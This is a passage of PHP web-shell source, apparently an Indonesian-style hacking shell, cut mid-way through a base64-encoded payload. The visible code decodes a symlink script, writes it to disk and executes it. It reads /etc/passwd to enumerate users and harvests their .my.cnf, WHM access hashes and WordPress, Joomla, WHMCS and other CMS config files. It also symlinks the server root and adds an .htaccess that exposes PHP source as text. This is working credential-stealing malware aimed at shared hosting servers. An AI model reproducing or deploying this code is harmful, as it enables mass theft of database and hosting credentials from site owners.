RzaXRlc3MuJy13aG0td2htY3MudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvd2htL1dITUNTL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictd2htLVdITUNTLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3dobWMvV0hNL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictd2htYy1XSE0udHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvd2htY3MvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy13aG1jcy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9zdXBwb3J0L2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictc3VwcG9ydC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9zdXBwL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictc3VwcC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9zZWN1cmUvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1zdWN1cmUudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvc2VjdXJlL3dobS9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLXN1Y3VyZS13aG0udHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvc2VjdXJlL3dobWNzL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictc3VjdXJlLXdobWNzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2NwYW5lbC9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLWNwYW5lbC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9wYW5lbC9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLXBhbmVsLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2hvc3QvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1ob3N0LnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2hvc3RpbmcvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1ob3N0aW5nLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2hvc3RzL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictaG9zdHMudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1qb29tbGEudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvc3VibWl0dGlja2V0LnBocCcsJHNpdGVzcy4nLXdobWNzMi50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9jbGllbnRzL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictY2xpZW50cy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9jbGllbnQvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1jbGllbnQudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvY2xpZW50ZXMvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1jbGllbnRlcy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9jbGllbnRlL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictY2xpZW50LnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2NsaWVudHN1cHBvcnQvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1jbGllbnRzdXBwb3J0LnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2JpbGxpbmcvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1iaWxsaW5nLnR4dCcpOyANCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9tYW5hZ2UvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy13aG0tbWFuYWdlLnR4dCcpOyANCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9teS9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLXdobS1teS50eHQnKTsgDQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvbXlzaG9wL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictd2htLW15c2hvcC50eHQnKTsgDQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvaW5jbHVkZXMvZGlzdC1jb25maWd1cmUucGhwJywkc2l0ZXNzLictemVuY2FydC50eHQnKTsgDQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvemVuY2FydC9pbmNsdWRlcy9kaXN0LWNvbmZpZ3VyZS5waHAnLCRzaXRlc3MuJy1zaG9wLXplbmNhcnQudHh0Jyk7IA0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3Nob3AvaW5jbHVkZXMvZGlzdC1jb25maWd1cmUucGhwJywkc2l0ZXNzLictc2hvcC1aQ3Nob3AudHh0Jyk7IA0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL1NldHRpbmdzLnBocCcsJHNpdGVzcy4nLXNtZi50eHQnKTsgDQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvc21mL1NldHRpbmdzLnBocCcsJHNpdGVzcy4nLXNtZjIudHh0Jyk7IA0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2ZvcnVtL1NldHRpbmdzLnBocCcsJHNpdGVzcy4nLXNtZi1mb3J1bS50eHQnKTsgDQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvZm9ydW1zL1NldHRpbmdzLnBocCcsJHNpdGVzcy4nLXNtZi1mb3J1bXMudHh0Jyk7IA0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3VwbG9hZC9pbmNsdWRlcy9jb25maWcucGhwJywkc2l0ZXNzLictdXAudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvYXJ0aWNsZS9jb25maWcucGhwJywkc2l0ZXNzLictTndhaHkudHh0Jyk7IA0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3VwL2luY2x1ZGVzL2NvbmZpZy5waHAnLCRzaXRlc3MuJy11cDIudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvY29uZl9nbG9iYWwucGhwJywkc2l0ZXNzLictNi50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9pbmNsdWRlL2RiLnBocCcsJHNpdGVzcy4nLTcudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvY29ubmVjdC5waHAnLCRzaXRlc3MuJy1QSFAtRnVzaW9uLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL21rX2NvbmYucGhwJywkc2l0ZXNzLictOS50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9jb25maWcucGhwJywkc2l0ZXNzLictNGltYWdlcy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9zaXRlcy9kZWZhdWx0L3NldHRpbmdzLnBocCcsJHNpdGVzcy4nLURydXBhbC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9tZW1iZXIvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy0xbWVtYmVyLnR4dCcpIDsgDQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvYmlsbGluZ3MvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1iaWxsaW5ncy50eHQnKSA7IA0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3dobS9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLXdobS50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9zdXBwb3J0cy9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLXN1cHBvcnRzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3JlcXVpcmVzL2NvbmZpZy5waHAnLCRzaXRlc3MuJy1BTTRTUy1ob3N0aW5nLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3N1cHBvcnRzL2luY2x1ZGVzL2lzbzQyMTcucGhwJywkc2l0ZXNzLictaG9zdGJpbGxzLXN1cHBvcnRzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2NsaWVudC9pbmNsdWRlcy9pc280MjE3LnBocCcsJHNpdGVzcy4nLWhvc3RiaWxscy1jbGllbnQudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvc3VwcG9ydC9pbmNsdWRlcy9pc280MjE3LnBocCcsJHNpdGVzcy4nLWhvc3RiaWxscy1zdXBwb3J0LnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2JpbGxpbmcvaW5jbHVkZXMvaXNvNDIxNy5waHAnLCRzaXRlc3MuJy1ob3N0YmlsbHMtYmlsbGluZy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9iaWxsaW5ncy9pbmNsdWRlcy9pc280MjE3LnBocCcsJHNpdGVzcy4nLWhvc3RiaWxscy1iaWxsaW5ncy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9ob3N0L2luY2x1ZGVzL2lzbzQyMTcucGhwJywkc2l0ZXNzLictaG9zdGJpbGxzLWhvc3QudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvaG9zdHMvaW5jbHVkZXMvaXNvNDIxNy5waHAnLCRzaXRlc3MuJy1ob3N0YmlsbHMtaG9zdHMudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvaG9zdGluZy9pbmNsdWRlcy9pc280MjE3LnBocCcsJHNpdGVzcy4nLWhvc3RiaWxscy1ob3N0aW5nLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2hvc3RpbmdzL2luY2x1ZGVzL2lzbzQyMTcucGhwJywkc2l0ZXNzLictaG9zdGJpbGxzLWhvc3RpbmdzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2luY2x1ZGVzL2lzbzQyMTcucGhwJywkc2l0ZXNzLictaG9zdGJpbGxzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2hvc3RiaWxsaW5jbHVkZXMvaXNvNDIxNy5waHAnLCRzaXRlc3MuJy1ob3N0YmlsbHMtaG9zdGJpbGxzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2luY2x1ZGVzL2lzbzQyMTcucGhwJywkc2l0ZXNzLictaG9zdGJpbGxzLWhvc3RiaWxsLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2FwcC9ldGMvbG9jYWwueG1sJywkc2l0ZXNzLictTWFnZW50by50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9hZG1pbi9jb25maWcucGhwJywkc2l0ZXNzLictT3BlbmNhcnQudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvY29uZmlnL3NldHRpbmdzLmluYy5waHAnLCRzaXRlc3MuJy1QcmVzdGFzaG9wLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2NvbmZpZy9rb25la3NpLnBocCcsJHNpdGVzcy4nLUxva29tZWRpYS50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9sb2tvbWVkaWEvY29uZmlnL2tvbmVrc2kucGhwJywkc2l0ZXNzLictTG9rb21lZGlhLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3NsY29uZmlnLnBocCcsJHNpdGVzcy4nLVNpdGVsb2NrLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2FwcGxpY2F0aW9uL2NvbmZpZy9kYXRhYmFzZS5waHAnLCRzaXRlc3MuJy1FbGxpc2xhYi50eHQnKTsNCn0NCnByaW50ICJMb2NhdGlvbjogLi9cblxuIjs=";
3049. $file = "btm_conf/vhost.cin";
3050. $handle = fopen($file ,"w+");
3051. fwrite($handle ,base64_decode($vhost));
3052. fclose($handle);
3053. chmod($file, 0755);
3054. if(exe("cd btm_conf && ./vhost.cin")) {
3055. echo "<center><a href='$link_config/btm_conf'><font color=lime>Done</font></a></center>";
3056. } else {
3057. echo "<center><a href='$link_config/btm_conf/vhost.cin'><font color=lime>Done</font></a></center>";
3058. }
3059.  
3060. } else {
3061. $etc = fopen("/etc/passwd", "r") or die("<pre><font color=red>Can't read /etc/passwd</font></pre>");
3062. while($passwd = fgets($etc)) {
3063. if($passwd == "" || !$etc) {
3064. echo "<font color=red>Can't read /etc/passwd</font>";
3065. } else {
3066. preg_match_all('/(.*?):x:/', $passwd, $user_config);
3067. foreach($user_config[1] as $user_idx) {
3068. $user_config_dir = "/home/$user_idx/public_html/";
3069. if(is_readable($user_config_dir)) {
3070. $grab_config = array(
3071. "/home/$user_idx/.my.cnf" => "cpanel",
3072. "/home/$user_idx/.accesshash" => "WHM-accesshash",
3073. "$user_config_dir/po-content/config.php" => "Popoji",
3074. "$user_config_dir/vdo_config.php" => "Voodoo",
3075. "$user_config_dir/bw-configs/config.ini" => "BosWeb",
3076. "$user_config_dir/config/koneksi.php" => "Lokomedia",
3077. "$user_config_dir/lokomedia/config/koneksi.php" => "Lokomedia",
3078. "$user_config_dir/clientarea/configuration.php" => "WHMCS",
3079. "$user_config_dir/whm/configuration.php" => "WHMCS",
3080. "$user_config_dir/whmcs/configuration.php" => "WHMCS",
3081. "$user_config_dir/forum/config.php" => "phpBB",
3082. "$user_config_dir/sites/default/settings.php" => "Drupal",
3083. "$user_config_dir/config/settings.inc.php" => "PrestaShop",
3084. "$user_config_dir/app/etc/local.xml" => "Magento",
3085. "$user_config_dir/joomla/configuration.php" => "Joomla",
3086. "$user_config_dir/configuration.php" => "Joomla",
3087. "$user_config_dir/wp/wp-config.php" => "WordPress",
3088. "$user_config_dir/wordpress/wp-config.php" => "WordPress",
3089. "$user_config_dir/wp-config.php" => "WordPress",
3090. "$user_config_dir/admin/config.php" => "OpenCart",
3091. "$user_config_dir/slconfig.php" => "Sitelok",
3092. "$user_config_dir/conf_global.php" => "conf_global",
3093. "$user_config_dir/inc/config.php" => "inc",
3094. "$user_config_dir/whm/configuration.php" => "whm",
3095. "$user_config_dir/whmcs/configuration.php" => "whmcs",
3096. "$user_config_dir/support/configuration.php" => "supporwhmcs",
3097. "$user_config_dir/whmc/WHM/configuration.php" => "WHM",
3098. "$user_config_dir/whm/WHMCS/configuration.php" => "whmc",
3099. "$user_config_dir/whm/whmcs/configuration.php" => "WHMcs",
3100. "$user_config_dir/support/configuration.php" => "whmcsupp",
3101. "$user_config_dir/clients/configuration.php" => "whmcs-cli",
3102. "$user_config_dir/client/configuration.php" => "whmcs-cl",
3103. "$user_config_dir/clientes/configuration.php" => "whmcs-CL",
3104. "$user_config_dir/cliente/configuration.php" => "whmcs-Cl",
3105. "$user_config_dir/clientsupport/configuration.php" => "whmcs-csup",
3106. "$user_config_dir/billing/configuration.php" => "whmcs-bill",
3107. "$user_config_dir/admin/config.php" => "admin-conf",
3108. "$user_config_dir/application/config/database.php" => "Ellislab",
3109. "$user_config_dir/ticket/include/ost-config.php" => "OST-Ticket",
3110. "$user_config_dir/supports/configuration.php" => "supports.txt",
3111. "$user_config_dir/requires/config.php" => "AM4SS-hosting.txt",
3112. "$user_config_dir/supports/includes/iso4217.php" => "hostbills-supports.txt",
3113. "$user_config_dir/client/includes/iso4217.php" => "hostbills-client.txt",
3114. "$user_config_dir/support/includes/iso4217.php" => "hostbills-support.txt",
3115. "$user_config_dir/billing/includes/iso4217.php" => "hostbills-billing.txt",
3116. "$user_config_dir/billings/includes/iso4217.php" => "hostbills-billings.txt",
3117. "$user_config_dir/host/includes/iso4217.php" => "hostbills-host.txt",
3118. "$user_config_dir/hosts/includes/iso4217.php" => "hostbills-hosts.txt",
3119. "$user_config_dir/hosting/includes/iso4217.php" => "hostbills-hosting.txt",
3120. "$user_config_dir/hostings/includes/iso4217.php" => "hostbills-hostings.txt",
3121. "$user_config_dir/includes/iso4217.php" => "hostbills.txt",
3122. "$user_config_dir/hostbillincludes/iso4217.php" => "hostbills-hostbills.txt",
3123. "$user_config_dir/includes/iso4217.php" => "hostbills-hostbill.txt",
3124. "$user_config_dir/include/ost-config.php" => "OST-Ticket");
3125.  
3126.  
3127. foreach($grab_config as $config => $nama_config) {
3128. $ambil_config = file_get_contents($config);
3129. if($ambil_config == '') {
3130. } else {
3131. $file_config = fopen("btm_conf/$user_idx-$nama_config.txt","w");
3132. fputs($file_config,$ambil_config);
3133. }
3134. }
3135. }
3136. }
3137. }
3138. }
3139. echo "<center><a href='?dir=$dir/btm_conf'><font color=lime>Done</font></a></center>";
3140. }
3141. }
3142. elseif($_GET['do'] == 'config2') {
3143. echo "<center>";
3144. echo "<ul>";
3145. echo "<li> <a href='?dir=$dir&do=config'>Config</a> </li>";
3146. echo "<li> <a href='?dir=$dir&do=config2'>2nd Config</a> </li>";
3147. echo "<li> <a href='?dir=$dir&do=indi'>INDISHELL</a> </li>";
3148. echo "<li> <a href='?dir=$dir&do=vgrab'>VHosts Grabber</a> </li>";
3149. echo "</ul>";
3150. echo "</center>";
3151. if ($_POST["m"] && !$_POST["passwd"] == "") {
3152. echo "<center>Wait plz . . <br><br/>";
3153. $check = @ini_get("disable_functions");
3154. if (eregi("symlink", $check)) {
3155. die("<font color=red>Symlink is Disabled</font>");
3156. }
3157. @mkdir("btmgrab", 0777);
3158. @chdir("btmgrab");
3159. @symlink("/", "root");
3160. $htaccess = "
3161. Options all
3162. Options +Indexes
3163. Options +FollowSymLinks
3164. DirectoryIndex Sux.html
3165. AddType text/plain .php
3166. AddHandler server-parsed .php
3167. AddType text/plain .html
3168. AddHandler txt .html
3169. Require None
3170. Satisfy Any
3171. ";
3172. file_put_contents(".htaccess", $htaccess, FILE_APPEND);
3173. $etc_passwd = $_POST["passwd"];
3174. $etc_passwd = explode("
3175. ", $etc_passwd);
3176. foreach ($etc_passwd as $passwd) {
3177. $pawd = explode(":", $passwd);
3178. $user = $pawd[0];
3179. @symlink('/home/' . $user . '/public_html/includes/configure.php', $user . '-shop.txt');
3180. @symlink('/home/' . $user . '/.my.cnf', $user . '-cpanel.txt');
3181. @symlink('/home/' . $user . '/.accesshash', $user . '-WHM-accesshash.txt');
3182. @symlink('/home/' . $user . '/public_html/os/includes/configure.php', $user . '-shop-os.txt');
3183. @symlink('/home/' . $user . '/public_html/oscom/includes/configure.php', $user . '-oscom.txt');
3184. @symlink('/home/' . $user . '/public_html/oscommerce/includes/configure.php', $user . '-oscommerce.txt');
3185. @symlink('/home/' . $user . '/public_html/oscommerces/includes/configure.php', $user . '-oscommerces.txt');
3186. @symlink('/home/' . $user . '/public_html/shop/includes/configure.php', $user . '-shop2.txt');
3187. @symlink('/home/' . $user . '/public_html/shopping/includes/configure.php', $user . '-shop-shopping.txt');
3188. @symlink('/home/' . $user . '/public_html/sale/includes/configure.php', $user . '-sale.txt');
3189. @symlink('/home/' . $user . '/public_html/amember/config.inc.php', $user . '-amember.txt');
3190. @symlink('/home/' . $user . '/public_html/config.inc.php', $user . '-amember2.txt');
3191. @symlink('/home/' . $user . '/public_html/members/configuration.php', $user . '-members.txt');
3192. @symlink('/home/' . $user . '/public_html/config.php', $user . '-4images1.txt');
3193. @symlink('/home/' . $user . '/public_html/forum/includes/config.php', $user . '-forum.txt');
3194. @symlink('/home/' . $user . '/public_html/forums/includes/config.php', $user . '-forums.txt');
3195. @symlink('/home/' . $user . '/public_html/admin/conf.php', $user . '-5.txt');
3196. @symlink('/home/' . $user . '/public_html/admin/config.php', $user . '-4.txt');
3197. @symlink('/home/' . $user . '/public_html/wp-config.php', $user . '-wp13.txt');
3198. @symlink('/home/' . $user . '/public_html/wp/wp-config.php', $user . '-wp13-wp.txt');
3199. @symlink('/home/' . $user . '/public_html/WP/wp-config.php', $user . '-wp13-WP.txt');
3200. @symlink('/home/' . $user . '/public_html/wp/beta/wp-config.php', $user . '-wp13-wp-beta.txt');
3201. @symlink('/home/' . $user . '/public_html/beta/wp-config.php', $user . '-wp13-beta.txt');
3202. @symlink('/home/' . $user . '/public_html/press/wp-config.php', $user . '-wp13-press.txt');
3203. @symlink('/home/' . $user . '/public_html/wordpress/wp-config.php', $user . '-wp13-wordpress.txt');
3204. @symlink('/home/' . $user . '/public_html/Wordpress/wp-config.php', $user . '-wp13-Wordpress.txt');
3205. @symlink('/home/' . $user . '/public_html/blog/wp-config.php', $user . '-wp13-Wordpress.txt');
3206. @symlink('/home/' . $user . '/public_html/wordpress/beta/wp-config.php', $user . '-wp13-wordpress-beta.txt');
3207. @symlink('/home/' . $user . '/public_html/news/wp-config.php', $user . '-wp13-news.txt');
3208. @symlink('/home/' . $user . '/public_html/new/wp-config.php', $user . '-wp13-new.txt');
3209. @symlink('/home/' . $user . '/public_html/blog/wp-config.php', $user . '-wp-blog.txt');
3210. @symlink('/home/' . $user . '/public_html/beta/wp-config.php', $user . '-wp-beta.txt');
3211. @symlink('/home/' . $user . '/public_html/blogs/wp-config.php', $user . '-wp-blogs.txt');
3212. @symlink('/home/' . $user . '/public_html/home/wp-config.php', $user . '-wp-home.txt');
3213. @symlink('/home/' . $user . '/public_html/protal/wp-config.php', $user . '-wp-protal.txt');
3214. @symlink('/home/' . $user . '/public_html/site/wp-config.php', $user . '-wp-site.txt');
3215. @symlink('/home/' . $user . '/public_html/main/wp-config.php', $user . '-wp-main.txt');
3216. @symlink('/home/' . $user . '/public_html/test/wp-config.php', $user . '-wp-test.txt');
3217. @symlink('/home/' . $user . '/public_html/arcade/functions/dbclass.php', $user . '-ibproarcade.txt');
3218. @symlink('/home/' . $user . '/public_html/arcade/functions/dbclass.php', $user . '-ibproarcade.txt');
3219. @symlink('/home/' . $user . '/public_html/joomla/configuration.php', $user . '-joomla2.txt');
3220. @symlink('/home/' . $user . '/public_html/protal/configuration.php', $user . '-joomla-protal.txt');
3221. @symlink('/home/' . $user . '/public_html/joo/configuration.php', $user . '-joo.txt');
3222. @symlink('/home/' . $user . '/public_html/cms/configuration.php', $user . '-joomla-cms.txt');
3223. @symlink('/home/' . $user . '/public_html/site/configuration.php', $user . '-joomla-site.txt');
3224. @symlink('/home/' . $user . '/public_html/main/configuration.php', $user . '-joomla-main.txt');
3225. @symlink('/home/' . $user . '/public_html/news/configuration.php', $user . '-joomla-news.txt');
3226. @symlink('/home/' . $user . '/public_html/new/configuration.php', $user . '-joomla-new.txt');
3227. @symlink('/home/' . $user . '/public_html/home/configuration.php', $user . '-joomla-home.txt');
3228. @symlink('/home/' . $user . '/public_html/vb/includes/config.php', $user . '-vb-config.txt');
3229. @symlink('/home/' . $user . '/public_html/vb3/includes/config.php', $user . '-vb3-config.txt');
3230. @symlink('/home/' . $user . '/public_html/cc/includes/config.php', $user . '-vb1-config.txt');
3231. @symlink('/home/' . $user . '/public_html/includes/config.php', $user . '-includes-vb.txt');
3232. @symlink('/home/' . $user . '/public_html/forum/includes/class_core.php', $user . '-vbluttin-class_core.php.txt');
3233. @symlink('/home/' . $user . '/public_html/vb/includes/class_core.php', $user . '-vbluttin-class_core.php1.txt');
3234. @symlink('/home/' . $user . '/public_html/cc/includes/class_core.php', $user . '-vbluttin-class_core.php2.txt');
3235. @symlink('/home/' . $user . '/public_html/configuration.php', $user . '-joomla.txt');
3236. @symlink('/home/' . $user . '/public_html/includes/dist-configure.php', $user . '-zencart.txt');
3237. @symlink('/home/' . $user . '/public_html/zencart/includes/dist-configure.php', $user . '-shop-zencart.txt');
3238. @symlink('/home/' . $user . '/public_html/shop/includes/dist-configure.php', $user . '-shop-ZCshop.txt');
3239. @symlink('/home/' . $user . '/public_html/Settings.php', $user . '-smf.txt');
3240. @symlink('/home/' . $user . '/public_html/smf/Settings.php', $user . '-smf2.txt');
3241. @symlink('/home/' . $user . '/public_html/forum/Settings.php', $user . '-smf-forum.txt');
3242. @symlink('/home/' . $user . '/public_html/forums/Settings.php', $user . '-smf-forums.txt');
3243. @symlink('/home/' . $user . '/public_html/upload/includes/config.php', $user . '-up.txt');
3244. @symlink('/home/' . $user . '/public_html/article/config.php', $user . '-Nwahy.txt');
3245. @symlink('/home/' . $user . '/public_html/up/includes/config.php', $user . '-up2.txt');
3246. @symlink('/home/' . $user . '/public_html/conf_global.php', $user . '-6.txt');
3247. @symlink('/home/' . $user . '/public_html/include/db.php', $user . '-7.txt');
3248. @symlink('/home/' . $user . '/public_html/connect.php', $user . '-PHP-Fusion.txt');
3249. @symlink('/home/' . $user . '/public_html/mk_conf.php', $user . '-9.txt');
3250. @symlink('/home/' . $user . '/public_html/includes/config.php', $user . '-traidnt1.txt');
3251. @symlink('/home/' . $user . '/public_html/config.php', $user . '-4images.txt');
3252. @symlink('/home/' . $user . '/public_html/sites/default/settings.php', $user . '-Drupal.txt');
3253. @symlink('/home/' . $user . '/public_html/member/configuration.php', $user . '-1member.txt');
3254. @symlink('/home/' . $user . '/public_html/supports/includes/iso4217.php', $user . '-hostbills-supports.txt');
3255. @symlink('/home/' . $user . '/public_html/client/includes/iso4217.php', $user . '-hostbills-client.txt');
3256. @symlink('/home/' . $user . '/public_html/support/includes/iso4217.php', $user . '-hostbills-support.txt');
3257. @symlink('/home/' . $user . '/public_html/billing/includes/iso4217.php', $user . '-hostbills-billing.txt');
3258. @symlink('/home/' . $user . '/public_html/billings/includes/iso4217.php', $user . '-hostbills-billings.txt');
3259. @symlink('/home/' . $user . '/public_html/host/includes/iso4217.php', $user . '-hostbills-host.txt');
